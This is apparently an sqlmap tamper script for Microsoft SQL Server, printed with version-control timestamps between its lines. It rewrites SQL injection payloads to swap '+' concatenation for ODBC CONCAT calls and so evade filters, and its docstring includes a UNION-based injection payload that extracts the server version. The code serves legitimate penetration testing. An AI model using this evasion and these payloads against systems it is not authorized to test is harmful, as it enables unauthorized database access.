2019-05-08 13:47:52 +03:00
#!/usr/bin/env python
2017-02-17 12:26:25 +03:00
"""
2021-09-08 22:01:41 +03:00
Copyright ( c ) 2006 - 2021 sqlmap developers ( https : / / sqlmap . org / )
2017-10-11 15:50:46 +03:00
See the file ' LICENSE ' for copying permission
2017-02-17 12:26:25 +03:00
"""
2018-02-10 13:06:31 +03:00
import os
2017-02-17 12:26:25 +03:00
import re
2018-02-08 18:49:16 +03:00
from lib . core . common import singleTimeWarnMessage
2017-02-17 12:26:25 +03:00
from lib . core . common import zeroDepthSearch
2019-03-28 18:04:38 +03:00
from lib . core . compat import xrange
2018-02-08 18:49:16 +03:00
from lib . core . enums import DBMS
2017-02-17 12:26:25 +03:00
from lib . core . enums import PRIORITY
__priority__ = PRIORITY . HIGHEST
def dependencies ( ) :
2018-02-08 18:49:16 +03:00
singleTimeWarnMessage ( " tamper script ' %s ' is only meant to be run against %s " % ( os . path . basename ( __file__ ) . split ( " . " ) [ 0 ] , DBMS . MSSQL ) )
2017-02-17 12:26:25 +03:00
def tamper ( payload , * * kwargs ) :
"""
2018-07-31 03:18:33 +03:00
Replaces plus operator ( ' + ' ) with ( MsSQL ) ODBC function { fn CONCAT ( ) } counterpart
2017-02-17 12:26:25 +03:00
Tested against :
* Microsoft SQL Server 2008
Requirements :
* Microsoft SQL Server 2008 +
Notes :
* Useful in case ( ' + ' ) character is filtered
* https : / / msdn . microsoft . com / en - us / library / bb630290 . aspx
>> > tamper ( ' SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL ' )
' SELECT { fn CONCAT( { fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL '
2019-07-11 13:40:56 +03:00
>> > tamper ( ' 1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe ' )
' 1 UNION ALL SELECT NULL,NULL, { fn CONCAT( { fn CONCAT( { fn CONCAT( { fn CONCAT( { fn CONCAT( { fn CONCAT( { fn CONCAT( { fn CONCAT( { fn CONCAT( { fn CONCAT(CHAR(113),CHAR(118))},CHAR(112))},CHAR(112))},CHAR(113))},ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)))},CHAR(113))},CHAR(112))},CHAR(107))},CHAR(112))},CHAR(113))}-- qtfe '
2017-02-17 12:26:25 +03:00
"""
retVal = payload
if payload :
2019-07-11 13:40:56 +03:00
match = re . search ( r " ( ' [^ ' ]+ ' |CHAR \ ( \ d+ \ )) \ +.*(?<= \ +)( ' [^ ' ]+ ' |CHAR \ ( \ d+ \ )) " , retVal )
if match :
old = match . group ( 0 )
parts = [ ]
last = 0
for index in zeroDepthSearch ( old , ' + ' ) :
parts . append ( old [ last : index ] . strip ( ' + ' ) )
last = index
parts . append ( old [ last : ] . strip ( ' + ' ) )
replacement = parts [ 0 ]
for i in xrange ( 1 , len ( parts ) ) :
replacement = " { fn CONCAT( %s , %s )} " % ( replacement , parts [ i ] )
retVal = retVal . replace ( old , replacement )
2018-11-30 13:29:17 +03:00
2017-02-17 12:26:25 +03:00
return retVal